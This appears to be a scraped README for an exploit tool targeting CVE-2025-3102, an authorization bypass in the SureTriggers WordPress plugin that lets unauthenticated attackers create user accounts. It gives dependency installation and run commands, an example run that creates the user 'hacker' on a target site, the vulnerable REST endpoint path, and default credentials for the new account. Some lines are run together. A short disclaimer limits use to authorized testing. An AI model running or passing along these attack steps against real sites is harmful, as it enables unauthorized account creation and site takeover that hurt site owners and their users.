
SureTriggers <= 1.0.78 - Authorization Bypass Exploit
This tool exploits an authorization bypass vulnerability in the SureTriggers WordPress plugin (versions <= 1.0.78), allowing unauthenticated attackers to create new WordPress user accounts.
🔥 Developed by 0xgh057r3c0n
requests, coloramaInstall dependencies:
pip3 install -r requirements.txt
Or manually:
pip3 install requests colorama
python3 CVE-2025-3102.py -u <target_url> [--newmail <email>] [--newuser <username>] [--newpassword <password>]
python3 CVE-2025-3102.py -u https://target-site.com --newuser hacker --newpassword Pass123!
readme.txt.wp-json/sure-triggers/v1/automation/action.This tool is provided for educational and authorized penetration testing purposes only. Unauthorized access to systems is illegal and punishable under law. The author is not responsible for any misuse or damage caused.
| Argument | Description | Default |
|---|
-u, --url | Base URL of the WordPress site | Required |
--newmail | Email address for the new user | [email protected] |
--newuser | Username to create | 0xgh057r3c0n |
--newpassword | Password for the new user | Wiz007@8876@ |